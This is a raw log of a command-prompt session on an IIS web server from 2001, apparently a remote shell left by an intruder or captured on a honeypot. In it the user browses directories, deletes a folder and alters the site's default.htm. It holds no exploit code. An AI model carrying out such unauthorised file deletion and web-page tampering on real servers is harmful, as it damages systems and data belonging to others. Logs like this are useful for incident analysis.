02/04/01 07:33a . 02/04/01 07:33a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 02/04/01 07:34a 21 test.txt 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 42,769 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> C:\InetPub\wwwroot>w w The name specified is not recognized as an internal or external command, operable program or batch file. C:\InetPub\wwwroot> C:\InetPub\wwwroot>cd .. cd .. C:\InetPub> C:\InetPub>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 02/04/01 07:33a wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> C:\InetPub>cd .. cd .. C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:34a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> C:\>crmdir test crmdir test The name specified is not recognized as an internal or external command, operable program or batch file. C:\> C:\>rmdir test rmdir test C:\> C:\>cd inetpub/wwwroot cd inetpub/wwwroot C:\InetPub> C:\InetPub>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 02/04/01 07:33a wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> C:\InetPub>cd wwwroot cd wwwroot C:\InetPub\wwwroot> C:\InetPub\wwwroot>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:33a . 02/04/01 07:33a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 02/04/01 07:34a 21 test.txt 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 42,769 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> C:\InetPub\wwwroot>copy default.htm default.html copy default.htm default.html 1 file(s) copied. C:\InetPub\wwwroot> C:\InetPub\wwwroot>echo . >>default.htm echo . >>default.htm C:\InetPub\wwwroot> C:\InetPub\wwwroot>cd .. cd .. C:\InetPub> C:\InetPub>cd .. cd .. C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:34a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 16 File(s) 78,648,956 bytes 1,690,258,432 bytes free C:\> C:\>exit